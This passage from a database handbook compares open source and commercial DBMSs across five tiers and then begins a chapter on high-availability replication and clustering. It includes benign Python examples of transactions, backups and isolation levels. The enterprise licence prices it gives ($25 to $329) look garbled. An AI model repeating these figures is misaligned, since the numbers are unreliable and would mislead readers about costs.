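    conn.execute("CREATE TABLE account (id INTEGER PRIMARY KEY, balance INTEGER)")
    conn.executemany("INSERT INTO account VALUES (?, ?)", [(1, 100), (2, 100)])

    conn.execute("BEGIN")
    conn.execute("UPDATE account SET balance = balance - 40 WHERE id = 1")
    conn.execute("SAVEPOINT before_credit")
    conn.execute("UPDATE account SET balance = balance + 400 WHERE id = 2")  # wrong amount
    conn.execute("ROLLBACK TO before_credit")   # undo only the work done after the savepoint
    conn.execute("UPDATE account SET balance = balance + 40 WHERE id = 2")
    conn.execute("COMMIT")                      # atomicity: both updates persist, or neither
    print(conn.execute("SELECT id, balance FROM account ORDER BY id").fetchall())
    # [(1, 60), (2, 140)]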
Tier 2

All commercial systems support advanced data types like large objects, which have become increasingly popular over the years. Proprietary DBMSs and PostgreSQL have network-aware data types that recognize IPv4 and IPv6 addresses.
Moreover, MySQL and PostgreSQL both support the storing of geographic features, data types, and operations of the Open Geodata Interchange Standard (OpenGIS). All systems support enterprise-level features such as triggers, views, stored procedures, and cursors, while PostgreSQL and the commercial systems additionally support inheritance, sequences, and user-defined data types. Additionally, all systems use a procedural extension to the SQL query language to allow developers to implement routines that transfer some application logic to the database. Examples of using these routines are stored procedures that are written in the respective database procedural language. Among them, Oracle Database's choice, named PL/SQL, although considered the most difficult to use, is also thought of as the most powerful one. Firebird Database, using the Compiere module (Firebirdsql.org, 2006b), is capable of executing natively Oracle PL/SQL code, while MySQL and PostgreSQL use their own versions of procedural language in their DBMSs. On the other hand, MySQL alone in the open source camp supports the advanced feature of data partitioning within a DBMS. All open source DBMSs, save PostgreSQL, fall short when it comes to XML support. This constitutes an issue that will certainly be addressed in future releases of these systems. Finally, all open source systems lack OLAP support to perform highly demanding, large-enterprise business intelligence operations. On the commercial side, IBM, Microsoft, and Oracle supply their products with in-house OLAP modules that expand the capabilities of their software to serve organizations that require such services. The results from the comparison at this tier are summarized in Table 3.
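To ground the notion of moving application logic into the database, the short sketch below defines a trigger (Python with the standard-library sqlite3 module as a stand-in engine; trigger syntax and the available procedural languages, such as PL/SQL, differ between the products compared here, and the table names are invented for illustration).

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE student (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE audit_log (event TEXT, student_id INTEGER,
                                logged_at TEXT DEFAULT CURRENT_TIMESTAMP);

        -- Application logic pushed into the database: every insert is recorded.
        CREATE TRIGGER student_insert_audit AFTER INSERT ON student
        BEGIN
            INSERT INTO audit_log (event, student_id) VALUES ('insert', NEW.id);
        END;
    """)
    conn.execute("INSERT INTO student (name) VALUES ('Sarah')")
    print(conn.execute("SELECT event, student_id FROM audit_log").fetchall())
    # [('insert', 1)]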
Table 2. Tier 1 comparison results

RDBMS      | SQL Standard Compliance | ACID Compliance | Constraint Support | Transaction and Lock Support | Indexes
-----------|-------------------------|-----------------|--------------------|------------------------------|----------
DB2        | VERY HIGH               | YES             | YES                | VERY HIGH                    | VERY HIGH
Firebird   | VERY HIGH               | YES             | YES                | HIGH                         | HIGH
MySQL      | VERY HIGH               | YES/NO          | YES/NO             | HIGH                         | HIGH
Oracle     | VERY HIGH               | YES             | YES                | VERY HIGH                    | VERY HIGH
PostgreSQL | VERY HIGH               | YES             | YES                | HIGH                         | HIGH
SQL Server | VERY HIGH               | YES             | YES                | VERY HIGH                    | VERY HIGH
Table 3. Tier 2 comparison results

RDBMS      | Advanced Data Types | Advanced Features | OpenGIS Support | XML Support | OLAP Support | Object-Oriented Features
-----------|---------------------|-------------------|-----------------|-------------|--------------|-------------------------
DB2        | VERY HIGH           | VERY HIGH         | YES             | YES         | YES          | YES
Firebird   | HIGH                | HIGH              | NO              | NO          | NO           | NO
MySQL      | HIGH                | VERY HIGH         | YES             | NO          | NO           | NO
Oracle     | VERY HIGH           | VERY HIGH         | YES             | YES         | YES          | YES
PostgreSQL | VERY HIGH           | VERY HIGH         | YES             | YES         | NO           | YES
SQL Server | VERY HIGH           | VERY HIGH         | NO              | YES         | YES          | YES
Tier 3

This tier highlights some of the features that should be addressed by the open source DBMSs in order for them to become more competitive. With respect to security, open source DBMSs support access control mechanisms, data encryption, views, roles and other security methods that can undoubtedly constitute a reliable backbone for any organization. On the other hand, they lack the sophisticated security mechanisms offered by commercial products, such as Oracle's value-added add-on "Oracle Advanced Security" (Oracle.com, 2006), which offers more options and supports industry-standard authentication methods such as PKI. SQL Server, on the other hand, even though it often uses Windows authentication and is therefore subject to OS-based vulnerabilities that can compromise its operation, has received a C2 certificate from the U.S. government's National Security Agency that recommends it for use in government projects. When it comes to backup, open source DBMSs come with appropriate scripts to facilitate a simple text dump of the database data and its schema, such as Firebird's NBackup module. At the same time, all products provide methods for performing a hot database backup, that is, backing up the database without shutting it down. However, they still lack the array of options during a backup procedure that commercial systems offer, which allow the generation of automatic, selective and customisable backups. On the contrary, open source DBMSs prove to offer high data migration capabilities, allowing data hosted in their system to be formatted appropriately for use in another database. Commercial systems support data migration, often via commercial third-party tools. Another major feature of enterprise-level DBMSs is support for replication. Both MySQL and PostgreSQL have support (Devx.com, 2005) for single-master, multi-slave replication scenarios. Commercial systems offer more replication methods, although these methods are not considered of utmost necessity for
the majority of users and organizations. Finally, with respect to recovery, in MySQL only InnoDB tables provide automatic crash recovery of a running database in the background, without setting any locks or using replication methods. PostgreSQL uses a mechanism called write-ahead logging to provide database consistency checking and point-in-time recovery (PITR), which allows recovery either to the point of failure or to some other point in the past (PostgreSQL.com, 2005a). Firebird relies on third-party tools (FreeDownloadsCenter, 2006) that can be used for automatically diagnosing and repairing data corrupted by failures during normal operation. Commercial DBMSs provide automated and manual recovery capabilities that allow the database to return to any chosen state according to specific log files, such as the redo logs in Oracle Database. The results from the comparison at tier 3 are summarized in Table 4.
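The following sketch illustrates the kind of hot backup discussed above, using PostgreSQL's standard pg_dump utility driven from Python. The host, credentials and output path are placeholder assumptions, and comparable dump tools exist for the other systems.

```python
# Hypothetical sketch: a hot (online) logical backup of a PostgreSQL database
# using the standard pg_dump utility. Paths and credentials are placeholders.
import os
import subprocess
from datetime import date

outfile = f"/var/backups/testdb-{date.today()}.dump"

subprocess.run(
    ["pg_dump",
     "--host", "localhost",
     "--username", "demo",
     "--format", "custom",     # compressed archive, restorable with pg_restore
     "--file", outfile,
     "testdb"],
    check=True,
    env={**os.environ, "PGPASSWORD": "demo"},   # avoid an interactive prompt
)
print("backup written to", outfile)
```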
Tier 4

The fourth component consists of quality criteria such as scalability, reliability, and database performance. DB2, Oracle and SQL Server can scale to terabytes of data storage fairly easily, supporting millions of users. This is achieved (Microsoft.com, 2006) by supporting scale-up on symmetric multiprocessor (SMP) systems, allowing users to add processors, memory, disks and networking to build a large single node, as well as scale-out on multi-node clusters. Thus, it becomes possible for a huge database to be partitioned across a cluster of servers, with each server storing part of the whole database and doing a portion of the work, while the database remains accessible as a single entity. Various sources (IBM.com, 2006; Oracle.com, 2006) give an edge to one commercial system over another, but these systems are considered by many to belong to the same high-quality class (Wikipedia.org, 2006b).
Table 4. Tier 3 comparison results

RDBMS      | Security Features | Backup    | Data Migration | Replication | Recovery
-----------|-------------------|-----------|----------------|-------------|----------
DB2        | VERY HIGH         | VERY HIGH | HIGH           | VERY HIGH   | VERY HIGH
Firebird   | HIGH              | HIGH      | HIGH           | MEDIUM      | HIGH
MySQL      | HIGH              | HIGH      | VERY HIGH      | HIGH        | HIGH
Oracle     | VERY HIGH         | VERY HIGH | HIGH           | VERY HIGH   | VERY HIGH
PostgreSQL | HIGH              | HIGH      | VERY HIGH      | HIGH        | VERY HIGH
SQL Server | VERY HIGH         | VERY HIGH | HIGH           | VERY HIGH   | VERY HIGH
MySQL, using the MySQL Cluster option (MySQL.com, 2006), and PostgreSQL are known to run very fast, managing more than 500 transactions per second when dealing with databases hosting gigabytes of data, and they can perform adequately even when the size of the database exceeds that threshold. Firebird, as of January 2006, offers some baseline multiprocessor support, although it uses a standard process-based architecture. This significantly decreases its performance when the hosted data reach terabyte magnitude. With respect to reliability, MySQL, because of its large installed base and the knowledge and experience surrounding it, is perceived to be a highly reliable system. In the same direction, PostgreSQL, although less popular, has proved to be a very dependable system, a fact that can be credited to the rich set of features and the maturity of this software product (BusinessWeek.com, 2006). Firebird, on the other hand, although it has the smallest installed base, has demonstrated remarkable stability and consistency. Commercial systems, then again, are accompanied by industry-standard verification certificates that assure the product's reliability and quality of service. An example of this is the Common Criteria Certification awarded to SQL Server 2005 (Microsoft.com, 2006). The TPC (Transaction Processing Performance Council) is an independent organization that specifies typical transactions and some general rules these transactions should satisfy. The TPC produces benchmarks that measure transaction processing and database performance in terms of how many
transactions a given system and database can perform per unit of time, for example, transactions per second or transactions per minute. As of June 2006, Oracle is the fastest commercial DBMS, outperforming DB2 and SQL Server (Transaction Processing Performance Council, 2006) and maintaining the position it held in previous years (Eweek.com, 2002; Burleson Consulting, 2003; Promoteware.com, 2004). Open source DBMSs did not participate in this comparison; according to the party that performed the benchmark (Promoteware.com, 2004), this was because of their limitations when dealing with large data sets. However, at the data sizes typical of small to medium enterprises, several gigabytes, it has been shown that the open source DBMSs perform equivalently to the proprietary ones. Among the open source DBMSs, MySQL is believed to be the fastest (Eweek.com, 2002). The results from the comparison at tier 4 are summarized in Table 5.
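For readers who want a feel for what "transactions per second" means in practice, the sketch below times a naive stream of single-row transactions from Python. It is emphatically not a TPC benchmark (no mixed workload, no concurrent clients); the PostgreSQL connection details and table name are placeholder assumptions.

```python
# Hypothetical sketch: a naive single-connection measurement of committed
# transactions per second. Connection details and table are placeholders.
import time
import psycopg2

conn = psycopg2.connect(host="localhost", dbname="testdb",
                        user="demo", password="demo")
cur = conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS tps_probe (id SERIAL PRIMARY KEY, v INT)")
conn.commit()

N = 1000
start = time.perf_counter()
for i in range(N):
    cur.execute("INSERT INTO tps_probe (v) VALUES (%s)", (i,))
    conn.commit()              # one tiny transaction per insert
elapsed = time.perf_counter() - start

print(f"{N / elapsed:.0f} single-row transactions per second")
cur.close()
conn.close()
```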
Tier 5

On the whole, commercial products enjoy a high level of support from their respective owners, ranging from initial training to real-time diagnostic and monitoring capabilities that serve optimization ends. Additionally, many third-party affiliated consultants can be easily located all around the world. The issue of support for open source software in the enterprise meets with mixed points of view. Many do not realize that support is available for many open source products, beyond Web sites and mailing lists.
Table 5. Tier 4 comparison results

RDBMS      | Scalability | Reliability | Performance
-----------|-------------|-------------|------------
DB2        | VERY HIGH   | VERY HIGH   | VERY HIGH
Firebird   | HIGH        | HIGH        | HIGH
MySQL      | VERY HIGH   | VERY HIGH   | VERY HIGH
Oracle     | VERY HIGH   | VERY HIGH   | VERY HIGH
PostgreSQL | MEDIUM      | VERY HIGH   | HIGH
SQL Server | VERY HIGH   | VERY HIGH   | VERY HIGH
MySQL AB provides support for MySQL, and several companies, including PostgreSQL Inc., provide support for PostgreSQL. These offerings include support levels that rival those of commercial DBMSs, many providing 24x365 support. Training is an important issue for commercial DBMSs. IBM, Microsoft and Oracle set up courses and issue the relevant exams for certification to administer their databases (Dbazine.com, 2005). MySQL AB provides training in cities around the world and, in some cases, provides in-house education. PostgreSQL training is also available from third parties. Administration is an additional area where open source DBMSs shine. The use of smart graphical administration tools facilitates the management of the database. These tools can either be applications that run natively on the operating system or Web-based tools. Many of them are modelled closely on the tools available for commercial DBMSs, with the appropriate modifications. Of the commercial products, Oracle is believed to have the most complex administration, requiring significant knowledge of the system's internal structure on the part of the administrator. With respect to external library and API support, all systems enjoy the privilege of having implementations of all major programming interfaces, such as ODBC, JDBC, and C and C++ libraries, among others (PostgreSQL.org, 2005b). This allows developers to select their programming language and database of choice when creating applications that utilize a database server.
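The practical value of this uniform interface support can be sketched as follows: the same Python DB-API pattern talks to two different products, with only the driver import and connection arguments changing. The drivers, credentials and table name below are assumptions for the example.

```python
# Hypothetical sketch: the same DB-API 2.0 pattern works against different
# products; only the driver and connection arguments change. All names,
# credentials and the table are placeholders.
import psycopg2               # PostgreSQL driver
import mysql.connector        # MySQL driver

def row_count(conn, table):
    cur = conn.cursor()
    cur.execute(f"SELECT COUNT(*) FROM {table}")
    (count,) = cur.fetchone()
    cur.close()
    return count

pg = psycopg2.connect(host="localhost", dbname="testdb",
                      user="demo", password="demo")
my = mysql.connector.connect(host="localhost", database="testdb",
                             user="demo", password="demo")

for conn in (pg, my):
    print(row_count(conn, "accounts"))
    conn.close()
```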
Finally, the cost of acquiring a license to use the database software should not be overlooked. PostgreSQL and Firebird offer their services for free, even though third-party commercial modules may change that. MySQL AB dual-licenses its DBMS, and the commercial version of MySQL costs only a small fraction of the price of even the cheapest commercial DBMS. In the commercial camp, DB2 is the most expensive product (Microsoft.com, 2006) when considering the base product, maintainability, and additional enterprise-level capabilities, reaching in July 2006 a total of $329.00. Oracle is also an expensive product, as the enterprise edition bundled with the enterprise-level add-ons sells at approximately $266.00. On the other hand, Microsoft offers SQL Server, accompanied by its respective business intelligence support, at a significantly lower price of $25.00. The results from the comparison at tier 5 are summarized in Table 6.
Assumptions

Open source DBMSs have evolved to a considerable degree. The gap between these systems and their proprietary rivals has narrowed but not totally closed. Currently, the leading open source database engines, considering all possible aspects, are still inferior in terms of performance and features to DB2, Oracle and SQL Server.
Table 6. Tier 5 comparison results

RDBMS      | Training  | Administration | Technical Support | Interfaces | Cost
-----------|-----------|----------------|-------------------|------------|----------
DB2        | HIGH      | HIGH           | VERY HIGH         | VERY HIGH  | VERY HIGH
Firebird   | MEDIUM    | VERY HIGH      | LOW               | VERY HIGH  | -
MySQL      | HIGH      | HIGH           | HIGH              | VERY HIGH  | -/MEDIUM
Oracle     | VERY HIGH | HIGH           | VERY HIGH         | VERY HIGH  | VERY HIGH
PostgreSQL | LOW       | HIGH           | MEDIUM            | VERY HIGH  | -
SQL Server | HIGH      | HIGH           | VERY HIGH         | VERY HIGH  | HIGH
However, their capabilities may certainly offer enough to meet the needs of most small and medium-sized companies, or even of large ones for supplementary purposes. A living example of this practice is NASA, which uses MySQL to store information about public contracts, and the American Chemical Society, which uses PostgreSQL to store specific documents. It is important to note that most users and companies do not require some of the state-of-the-art advanced features and scalability options found exclusively in commercial DBMSs. Moreover, as with all open source software, Firebird, MySQL, PostgreSQL and other open source DBMSs are free, easy to try out and have plenty of freely available online documentation to help individuals learn how to use them. While these DBMSs may not be optimal for every possible project, they can prove acceptable and satisfying for many others.
FUTURE TRENDS

It is strongly believed that the open source movement will transform the software business in the next five to ten years, according to top industry executives speaking at the AO 2005 Innovation Summit at Stanford University (Wheeler, 2005). A group of analysts claims that the reasons for such adoption are not entirely of an ideological nature: stability, performance and security will be further drivers of open source software (BusinessWeek.com, 2006). Sun Microsystems
President Jonathan Schwartz claimed that the software industry must adopt open standards for it to thrive: "Open standards mean more than open source" (CNET NEWS.COM, 2005). This trend will inevitably influence the database software sector. As DBMSs built from open source code gain capabilities with every new release and enjoy rapid adoption by various users of new technology, it is almost certain that open source DBMSs will eventually draw level with commercial ones in all possible aspects. As a result, many companies will adopt these systems instead of commercial ones, allowing them to save money and reduce their operational costs, while forming at the same time a current that will definitely threaten commercial DBMS vendors. When Oracle Corporation announced its acquisition of Innobase (The Inquirer.net, 2005), it gave notice that MySQL's license to use the InnoDB storage mechanism would be renegotiated when it comes up for renewal the following year. Some in the industry see this purchase as a way for Oracle to align MySQL AB with its own policies and influence its future direction. Furthermore, Sun Microsystems announced that it would add support for the PostgreSQL database and ship it with the Solaris operating system. What is certain is that the open source boat that carries database system software as one of its passengers is sailing fast towards growing recognition and adoption.
Commercial firms that once neglected the presence of open source projects are now moving to approach and somehow contain open source initiatives, either by embracing them or by trying to tame them. Many field experts believe (BusinessWeek.com, 2006) that open source database software has a bright future, not as standalone products but as fundamental building blocks of commercial database software that also includes proprietary elements.
CONCLUSION

Many could question the interest surrounding open source DBMSs, because in many minds the open source label is attached mainly to initiatives such as Linux and Apache. Unfortunately for many commercial firms, and fortunately for the rest, open source is much more than these two representatives. After many years of hard work and little attention, open source DBMSs are starting to have a noticeable impact on the largest DBMS companies. Long criticized for lacking advanced enterprise features, reliability and customer support, open source DBMSs have become more and more competitive with the release of each new version. Taking this criticism into consideration, these products strived to improve and include the features they had lacked so far, while maintaining their strong points. As a result, it is only a matter of time before open source DBMSs can stand against their proprietary counterparts as equals, and even perform better in some sectors. This has alarmed many commercial organizations, which, in one way or another, have laid their hands on these open source products. Even though the results cannot be fully foreseen, it can be asserted without doubt that open source DBMSs will scale up from the intellectual-curiosity status they held in 2003 and become widespread. Either as standalone products or as subsystems of commercial DBMSs,
open source DBMSs will continue to support the IT community for the years to come, as they have always done.
REFERENCES

Burleson Consulting. (2003). Oracle vs. SQL Server. Retrieved from http://www.dba-oracle.com/oracle_tips_oracle_v_sql_server.htm#jambu

BusinessWeek.com. (2006). Taking on the database giants. Retrieved from http://www.businessweek.com/technology/content/feb2006/tc20060206_918648.htm

CNET NEWS.COM. (2005). Tech VIPs say future belongs to open source. Retrieved from http://news.com.com/Tech+VIPs+say+future+belongs+to+open+source/2100-7344_3-5798964.html

Dbazine.com. (2005). DBA certifications compared: Oracle vs. DB2 vs. SQL Server. Retrieved from http://www.dbazine.com/ofinterest/oi-articles/fosdick2

Devx.com. (2005). PostgreSQL vs. MySQL vs. commercial databases: It's all about what you need. Retrieved from http://www.devx.com/dbzone/Article/20743/1954?pf=true

Europa.eu.int. (2005). A big step forward. Retrieved from http://europa.eu.int/idabc/en/document/5220/469

Eweek.com. (2002). Server databases clash. Retrieved from http://www.eweek.com/article2/0,4149,293,00.asp

Fermi National Accelerator Laboratory. (2005). Comparison of Oracle, MySQL and PostgreSQL DBMS. Retrieved from http://www-css.fnal.gov/dsg/external/freeware/mysql-vs-pgsql.html

Firebirdsql.org. (2006a). Firebird - Relational database for the new millennium. Retrieved from http://www.firebirdsql.org/

Firebirdsql.org. (2006b). Firebird user documentation. Retrieved from http://www.firebirdsql.org/manual/index.html

FreeDownloadsCenter. (2006). Free InterBase downloads. Retrieved from http://www.freedownloadscenter.com/Search/interbase.html

IBM.com. (2006). IBM software - DB2 product family. Retrieved from http://www-306.ibm.com/software/data/db2/

Informationweek.com. (2004). Popularity growing for open source databases. Retrieved from http://www.informationweek.com/story/showArticle.jhtml?articleID=18312009

Johnson, J. (1997). Database: Models, languages, design. Oxford, UK: Oxford University Press.

Loney, K., & Bryla, B. (2005). Oracle Database 10g DBA handbook. Oracle Press.

Microsoft.com. (2006). Microsoft SQL Server home. Retrieved from http://www.microsoft.com/sql/default.mspx

MySQL.com. (2005). MySQL manual. Retrieved from http://dev.mysql.com/doc/mysql/en/index.html

Oracle.com. (2006). Oracle database security. Retrieved from http://www.oracle.com/technology/deploy/security/db_security/index.html

PostgreSQL.com. (2005a). PostgreSQL manual. Retrieved from http://www.postgresql.org/docs/8.0/interactive/index.html

PostgreSQL.org. (2005b). Open source database software comparison. Retrieved from http://jdbc.postgresql.org/

Promoteware.com. (2004). SQL server comparison chart (SQL vs MySQL vs Oracle). Retrieved from http://www.promoteware.com/Module/Article/ArticleView.aspx?id=23

Silberschatz, A., Korth, H. F., & Sudarshan, S. (2002). Database system concepts (4th ed.). McGraw-Hill.

Spenik, M., & Sledge, O. (2002). Microsoft SQL Server 2000 DBA survival guide (2nd ed.). Sams Press.

The Inquirer.net. (2005). Open source databases rounded up. Retrieved from http://www.theinquirer.net/?article=28201

Transaction Processing Performance Council. (2006). Retrieved from http://www.tpc.org/

Wheeler, D. (2005). How to evaluate open source software/free software (OSS/FS) programs. Retrieved from http://www.dwheeler.com/oss_fs_eval.html

Wikipedia.org. (2006a). Open source software. Retrieved from http://en.wikipedia.org/wiki/Open_source_software

Wikipedia.org. (2006b). Comparison of relational database management systems. Retrieved from http://en.wikipedia.org/wiki/Comparison_of_relational_database_management_systems

Winslow, M. (2004). The practical manager's guide to open source. Lulu Press.
KEY TERMS

Atomicity, Consistency, Isolation, and Durability (ACID): Considered to be the key transaction processing features/properties of a database system. Without them, the integrity of the database cannot be guaranteed.

Database: An organized collection of data (records) that is stored in a computer in a systematic way, so that computer software might consult it to answer questions. The database model in most common use today is the relational model.

Grid Computing: A computing model that provides the ability to perform higher throughput computing by taking advantage of many networked computers to model a virtual computer architecture that is able to distribute process
execution across a parallel infrastructure. Grids use the resources of many separate computers connected by a network to solve large-scale computation problems.

GNU General Public License (GPL): It is the most popular free software license, originally written by Richard Stallman for the GNU project. The GPL grants the recipients of computer software the following rights:

• Freedom to run the program, for any purpose
• Freedom to study how the program works, and modify it (access to the source code is a precondition for this)
• Freedom to redistribute copies
• Freedom to improve the program, and release the improvements to the public (access to the source code is a precondition for this)
Graphical User Interface (GUI): It refers to computer software that offers direct manipulation of graphical images and widgets in addition to text.

Object-Relational Database Management System (ORDBMS): It is a database management system that allows developers to integrate the database with their own custom data types and methods.

Online Analytical Processing (OLAP): It is an approach to quickly provide the answer to complex analytical queries. It is part of the broader business intelligence category that also includes
data mining. The typical applications of OLAP are in business reporting for sales, marketing, management reporting, business performance management (BPM), budgeting and forecasting, financial reporting, and similar areas.

Open Source Software (OSS): Computer software available with its source code under an open source license to study, change and improve its design. The open source philosophy further defines a boundary on the usage, modification, and redistribution of open source software. Software licenses grant rights to users which would otherwise be prohibited by copyright. These include rights on usage, modification, and redistribution. Several open source software licenses have qualified within the boundary of the Open Source Definition.

Relational Database Management System (RDBMS): It is a database management system that is based on the relational model as introduced by Edgar F. Codd. The model represents all information in the form of multiple related tables, each consisting of rows and columns.

Structured Query Language (SQL): It is the most popular computer language used to create, modify and retrieve data from relational database management systems. The language has evolved beyond its original purpose to support object-relational database management systems. It is an ANSI/ISO standard.
This work was previously published in Handbook of Research on Open Source Software: Technological, Economic, and Social Perspectives, edited by K. St. Amant and B. Still, pp. 294-308, copyright 2007 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 1.3
Highly Available Database Management Systems
Wenbing Zhao
Cleveland State University, USA
INTRODUCTION

In the Internet age, real-time Web-based services are becoming more pervasive every day. They span virtually all business and government sectors, and typically have a large number of users. Many such services require continuous operation, 24 hours a day, seven days a week. Any extended disruption in services, including both planned and unplanned downtime, can result in significant financial loss and negative social effects. Consequently, the systems providing these services must be made highly available. A Web-based service is typically powered by a multi-tier system, consisting of Web servers, application servers, and database management systems, running in a server farm environment. The Web servers handle direct Web traffic and pass requests that need further processing to the application servers. The application servers process the requests according to the predefined business logic. The database management systems store and manage all mission-critical data and application
states so that the Web servers and application servers can be programmed as stateless servers. (Some application servers may cache information or keep session state. However, the loss of such state may reduce performance temporarily or may be slightly annoying to the affected user, but it is not critical.) This design is driven by the demand for high scalability (to support a large number of users) and high availability (to provide services all the time). If the number of users increases, more Web servers and application servers can be added dynamically. If a Web server or an application server fails, the next request can be routed to another server for processing. Inevitably, this design increases the burden and importance of the database management systems. However, this is not done without good reason. Web applications often need to access and generate a huge amount of data on requests from a large number of users. A database management system can store and manage the data in a well-organized and structured way (often using the relational model). It also provides highly efficient
concurrency control on accesses to shared data. While it is relatively straightforward to ensure high availability for Web servers and application servers by simply running multiple copies in the stateless design, it is not so for a database management system, which in general has abundant state. The subject of highly available database systems has been studied for more than two decades, and there exist many alternative solutions (Agrawal, El Abbadi, & Steinke, 1997; Kemme, & Alonso, 2000; Patino-Martinez, Jimenez-Peris, Kemme, & Alonso, 2005). In this article, we provide an overview of two of the most popular database high availability strategies, namely database replication and database clustering. The emphasis is given to those that have been adopted and implemented by major database management systems (Davies & Fisk, 2006; Ault & Tumma, 2003).
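As a minimal illustration of the availability idea introduced above, the sketch below shows the simplest client-side tactic: trying a list of redundant database endpoints in order. Real deployments push such failover into drivers, load balancers or the cluster itself; the endpoints, credentials and psycopg2 driver here are placeholder assumptions.

```python
# Hypothetical sketch: the crudest client-side notion of availability --
# try redundant database endpoints in order and use the first that answers.
# Hostnames, credentials and the psycopg2 driver are placeholders.
import psycopg2

ENDPOINTS = [
    {"host": "db-primary.example.com", "dbname": "appdb",
     "user": "app", "password": "secret"},
    {"host": "db-standby.example.com", "dbname": "appdb",
     "user": "app", "password": "secret"},
]

def connect_with_failover(endpoints, timeout=3):
    last_error = None
    for params in endpoints:
        try:
            return psycopg2.connect(connect_timeout=timeout, **params)
        except psycopg2.OperationalError as exc:
            last_error = exc           # endpoint unreachable; try the next one
    raise RuntimeError("no database endpoint reachable") from last_error

conn = connect_with_failover(ENDPOINTS)
print("connected to", conn.get_dsn_parameters().get("host"))
```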
BACKGROUND

A database management system consists of a set of data and a number of processes that manage the data. These processes are often collectively referred to as database servers. The core programming model used in database management systems is called transaction processing. In this programming model, a group of read and write operations on a data set are demarcated within a transaction. A transaction has the following ACID properties (Gray & Reuter, 1993):

• Atomicity: All operations on the data set agree on the same outcome. Either all the operations succeed (the transaction commits) or none of them do (the transaction aborts).
• Consistency: If the database is consistent at the beginning of a transaction, then the database remains consistent after the transaction commits.
• Isolation: A transaction does not read or overwrite a data item that has been accessed by another concurrent transaction.
• Durability: The update to the data set becomes permanent once the transaction is committed.
To support multiple concurrent users, a database management system uses sophisticated concurrency control algorithms to ensure the isolation of different transactions even if they access some shared data concurrently (Bernstein, Hadzilacos, & Goodman, 1987). The strongest isolation can be achieved by imposing a serializable order on all conflicting read and write operations of a set of transactions so that the transactions appear to be executed sequentially. Two operations are said to be conflicting if both operations access the same data item, at least one of them is a write operation, and they belong to different transactions. Another popular isolation model is snapshot isolation. Under the snapshot isolation model, a transaction performs its operations against a snapshot of the database taken at the start of the transaction. The transaction will be committed if the write operations do not conflict with any other transaction that has committed since the snapshot was taken. The snapshot isolation model can provide better concurrent execution than the serializable isolation model. A major challenge in database replication, the basic method to achieve high availability, is that it is not acceptable to reduce the concurrency levels. This is in sharp contrast to the replication requirement in some other field, which often assumes that the replicas are single-threaded and deterministic (Castro & Liskov, 2002).
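To connect these isolation models to practice, the following sketch requests specific isolation levels from PostgreSQL through psycopg2, whose REPEATABLE READ level behaves as snapshot isolation. The connection parameters and the table are placeholder assumptions.

```python
# Hypothetical sketch: requesting a particular isolation level per session in
# PostgreSQL via psycopg2. Connection details and the table are placeholders.
import psycopg2

conn = psycopg2.connect(host="localhost", dbname="testdb",
                        user="demo", password="demo")

# REPEATABLE READ in PostgreSQL behaves as snapshot isolation: every read in
# the transaction sees the database as of the transaction's start.
conn.set_session(isolation_level="REPEATABLE READ")
with conn.cursor() as cur:
    cur.execute("SELECT COUNT(*) FROM accounts")
    print("rows visible in the snapshot:", cur.fetchone()[0])
conn.commit()

# SERIALIZABLE asks for the strongest guarantee; a conflicting concurrent
# transaction may be aborted with a serialization failure and must be retried.
conn.set_session(isolation_level="SERIALIZABLE")
with conn.cursor() as cur:
    cur.execute("UPDATE accounts SET balance = balance + 1 WHERE id = 1")
conn.commit()

conn.close()
```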
DATABASE HIGH AVAILABILITY TECHNIQUES

To achieve high availability, a database system must try to maximize the time to operate correctly without a fault and minimize the time to recover from a fault. The transaction processing model used in database management systems has some
degree of fault tolerance in that a fault normally cannot corrupt the integrity of the database. If a fault occurs, all ongoing transactions will be aborted on recovery. However, the recovery time would be too long to satisfy the high availability requirement. To effectively minimize the recovery time, redundant hardware and software must be used. Many types of hardware fault can in fact be masked. For example, power failures can be masked by using redundant power supplies, and local communication system failures can be masked by using redundant network interface cards, cables, and switches. Storage medium failures can be masked by using RAID (redundant array of inexpensive disks) or similar techniques. To tolerate the failures of database servers, several server instances (instead of one) must be used so that if one fails, another instance can take over. The most common techniques are database replication and database clustering. These two techniques are not completely distinct from each other, however. Database replication is typically used to protect against total site failures. In database replication, two or more redundant database systems operate in different sites — ideally in different geographical regions — and communicate with each other using messages over a (possibly redundant) communication channel. Database clustering is used to provide high availability for a local site. There are two competing approaches in database clustering. One uses a shared-everything (also referred to as shared-disk) design, such as the Oracle Real Application Cluster (RAC) (Ault & Tumma, 2003). The other follows a shared-nothing strategy, such as the MySQL Cluster (Davies & Fisk, 2006) and most DB2 shared database systems. To achieve maximum fault tolerance and hence high availability, one can combine database replication with database clustering.
Database Replication

Database replication means that there are two or more instances of database management systems,
including server processes, data files, and logs, running on different sites. Usually one of the replicas is designated as the primary, and the rest of the replicas are backups. The primary accepts users’ requests and propagates the changes to the database to the backups. In some systems, the backups are allowed to accept read-only queries. It is also possible to configure all replicas to handle users’ requests directly. But doing so increases the complexity of concurrency control and the risk of more frequent transaction aborts. Depending on how and when changes to the database are propagated across the replicas, there are two different database replication styles, often referred to as eager replication and lazy replication (Gray & Reuter, 1993). In eager replication, the changes (i.e., the redo log) are transferred to the backups synchronously before the commit of a transaction. In lazy replication, the changes are transferred asynchronously from the primary to the backups after the transactions have been committed. Because of the high communication cost, eager replication is rarely used to protect site failures where the primary and the backups are usually far apart. (Eager replication has been used in some shared-nothing database clusters.)
Eager Replication

To ensure strong replica consistency, the primary must propagate the changes to the backups within the boundary of a transaction. For this, a distributed commit protocol is needed to coordinate the commitment of each transaction across all replicas. The benefit of eager replication is that if the primary fails, a backup can take over instantly as soon as it detects the primary failure. The most popular distributed commit protocol is the two-phase commit (2PC) protocol (Gray & Reuter, 1993). The 2PC protocol guarantees the atomicity of a transaction across all replicas in two phases. In the first phase, the primary (which serves as the coordinator for the protocol) sends
